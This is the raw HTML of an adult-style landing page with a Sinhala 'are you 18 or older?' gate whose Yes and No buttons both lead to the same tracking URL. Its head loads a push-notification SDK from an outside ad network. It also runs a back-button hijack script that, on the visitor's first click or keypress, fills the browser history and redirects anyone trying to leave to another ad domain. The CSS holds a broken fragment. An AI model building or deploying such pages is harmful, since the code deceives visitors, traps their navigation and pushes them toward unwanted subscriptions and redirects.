 <script type="text/javascript">var ip = "";</script><!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
   
                <style>
body {
	background-image: url(none;);
	background-repeat: no-repeat;
	background-color: #900C3F;
    color: #000000;
    background-size: 0;
}
a {
    color: #ffffff;
    text-decoration: none;
}
.wrapper > header {
    border-color: transparent;
}

.wrapper > header img {
    height: 150px;
}
#main{
	position:relative;
	max-width:100%;
	padding:0 2em 3em;
	background: transparent;
	border-radius:4px;
	cursor:default;
	text-align:center;
}

#main .avatar1 img{
	width: 215px;
	height: 280px;
	display:block;
	margin:0 auto;
	border-radius:100%;
	box-shadow: 1px 6px 0px #000000, -2px -6px 0px #000000;
}
@-webkit-keyframes heartBeat {
    0% {
        -webkit-transform: scale(1);
        transform: scale(1);
    }
    14% {
        -webkit-transform: scale(1.2);
        transform: scale(1.2);
    }
    28% {
        -webkit-transform: scale(1);
        transform: scale(1);
    }
    42% {
        -webkit-transform: scale(1.2);
        transform: scale(1.2);
    }
    70% {
        -webkit-transform: scale(1);
        transform: scale(1);
    }
}
@keyframes heartBeat {
    0% {
        -webkit-transform: scale(1);
        transform: scale(1);
    }
    14% {
        -webkit-transform: scale(1.2);
        transform: scale(1.2);
    }
    28% {
        -webkit-transform: scale(1);
        transform: scale(1);
    }
    42% {
        -webkit-transform: scale(1.2);
        transform: scale(1.2);
    }
    70% {
        -webkit-transform: scale(1);
        transform: scale(1);
    }
}
.animate__heartBeat {
    -webkit-animation-name: heartBeat;
    animation-name: heartBeat;
    -webkit-animation-duration: 1.3s;
    animation-duration: 1.3s;
    -webkit-animation-duration: calc(var(--animate-duration) * 1.3);
    animation-duration: calc(var(--animate-duration) * 1.3);
    -webkit-animation-timing-function: ease-in-out;
    animation-timing-function: ease-in-out;
}

.btn {
  min-width: 120px;
  min-height: 30px;
  font-size: 16px;
  text-transform: uppercase;
  letter-spacing: 1.3px;
  font-weight: 700;
  color: #000000;
  background: linear-gradient(to right, #7f7f7f 0%, #7f7f7f  51%, #7f7f7f  100%);
  border: none;
  border-radius: 1000px;
  box-shadow: 12px 12px 24px rgba(#7f7f7f);
  transition: all 0.3s ease-in-out 0s;
  cursor: pointer;
  outline: none;
  position: relative;
  padding: 10px;
}

.btn-yes {
    background: linear-gradient(to right, #7f7f7f 0%, #7f7f7f  51%, #7f7f7f  100%);
    color: #ffffff;
}

.btn-yes:hover {
    background-color: #7f7f7f;
}


.btn-no {
    background: linear-gradient(to right, #7f7f7f 0%, #7f7f7f  51%, #7f7f7f  100%);
    color: #ffffff;
}


.btn-no:hover {
    background-color: #7f7f7f;
}
  
body {
    margin: 0;
    padding: 0;
    height: 100%;
    font-family: 16px;
    font-size: Arial, Helvetica, sans-serif;
}

img {
    border: 0;
    max-width: 100%;
}

a {
    display: inline-block;
}

p,
ul,
li,
ol,
h1,
h2,
h3,
h4,
h5 {
    margin: 0;
    padding: 0;
    list-style: none;
    font-weight: normal;
}

.hide {
    display: none;
}

.wrapper > header {
    margin-bottom: 15px;
    border-bottom-width: 1px;
    border-bottom-style: solid;
}

@media (max-width: 420px) {
	body {
	background-image: url(none;);
	background-attachment: fixed;
	background-position: top left;
}
    .wrapper > header {
        border-bottom-width: 3px;
    }
}

.wrapper > header img {
    display: block;
    margin: auto;
    padding: 15px 0;
    height: 150px;
}

@media (max-width: 380px) {
    .wrapper > header img {
        padding: 10px 0;
        height: 150px;
    }
}

.wrapper-content {
    padding: 10px 0;
    overflow: hidden;
    text-align: center;
}

.box:not(:first-child) {
    display: none;
}

.box .box-content {
    margin-top: 15px;
}

.box .box-header {
    margin: 25px auto;
    max-width: 320px;
}

.box {
    display: inline-block;
    margin: 0 auto;
}

#main .avatar img {
    position: relative;
    display: inline-block;
    margin: 0 auto;
    padding: 7px;
    border-bottom-width: 1px;
    border-bottom-style: solid;
    border-radius: 7px;
}

#main .avatar img {
    display: block;
    margin: auto;
}

@media (max-width: 480px) {
#main .avatar img {
        width: 260px;
    }
}

@media (max-width: 380px) {
#main .avatar img {
        width: 225px;
    }
}

@media (max-width: 350px) {
#main .avatar img {
        width: 200px;
    }
}

ansform: rotate(-45deg);
}

@media (max-width: 480px) {
   
}
@media (max-width: 350px) {

}

.box-final {
    max-width: 400px;
    margin: 0 auto;
}

@media (max-width: 360px) {
    .box-final {
        margin: 0 10px;
    }
}

.box-final .box-header {
    max-width: none;
}

.box-final .box-content {
    margin: 0 10px;
    padding: 8px 15px;
    border-width: 1px;
    border-style: solid;
    border-radius: 10px;
    text-align: left;
    font-size: 14px;
    line-height: 1.4;
}

.box-final .box-content p:not(:last-child) {
    margin-bottom: 10px;
}

.box-final .box-btn {
    margin-top: 30px;
}

.box-btn {
    margin-top: 20px;
}

@media only screen and (max-width: 350px) {
    #main .avatar img {
        max-height: 380px;
    }
    .box .box-content,
    .box .box-header {
        margin-top: 10px;
    }
    .box-header h2 {
        font-size: 16px;
    }
    .box-btn {
        margin-top: 15px;
    }
}
</style>    




<!--Rollerads-->
<script async data-cfasync="false">
  (function() {
      const url = new URL(window.location.href);
      const clickID = url.searchParams.get("click_id");
      const sourceID = url.searchParams.get("source_id");

      const s = document.createElement("script");
      s.dataset.cfasync = "false";
      s.src = "https://sdk4push.com/f/sdk.js?z=1238026";
      s.onload = (opts) => {
          opts.zoneID = 1238026;
          opts.extClickID = clickID;
          opts.subID1 = sourceID;
          opts.actions.onPermissionGranted = () => {};
          opts.actions.onPermissionDenied = () => {};
          opts.actions.onAlreadySubscribed = () => {};
          opts.actions.onError = () => {};
      };
      document.head.appendChild(s);
  })()
</script>

 <!--iMonetizerIt-->

<script> function imiBB() { let url = "https://app.impih.com/?utm_medium=9afb263ead84fd656a37a10f917fc288156a2bdb&utm_campaign=WW&2=bbr&np=1&cid={clickid}"; try { history.pushState({}, '', location.href); history.pushState({}, '', location.href); window.onpopstate = function (ev) { if (ev['state']) { location.replace(url); } }; } catch (ex) {} } !function () { let touched = false; let chromeVersion = 0; try { chromeVersion = +(new RegExp('Chrome/([0-9]+)').exec(navigator.userAgent)[1]); } catch (e) { chromeVersion = 0; } if (chromeVersion >= 75) { window.addEventListener('mouseup', function () { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); document.addEventListener("DOMContentLoaded", function () { document.body.addEventListener('touchend', function (evt) { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); document.body.addEventListener('keydown', function () { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); } ); } else { setTimeout(function () { imiBB(); } , 0); } } (); </script>

</head>
<body>



    <body>
<div class="wrapper">
<title>ඔබ 18 හෝ ඊට වැඩිද? </title>
        <header>
            <img src="./lpz/lpfiles/lk/Sri Lanka flag-XXL-anim.gif" alt="Logo">
        </header>
        <section id="main">
            <!-- step 1 -->
            <div class="box js-step js-step1">            
                <header class="box-header">
                    <h3 class="text-transform-none">ඔබ 18 හෝ ඊට වැඩිද? </h3>
                </header>
                   <a href="https://tkr9.surpriseanddelightgifts.com/cool.php?lp=1"> <div class="wrap"><button class="btn btn-yes" type="submit">ඔව්</button></div> </a>
				   <a href="https://tkr9.surpriseanddelightgifts.com/cool.php?lp=1"> <div class="wrap"><button class="btn btn-no" type="submit">නැත </button></div> </a>
            </div>
</section>
            </div>
</body></body>

</html>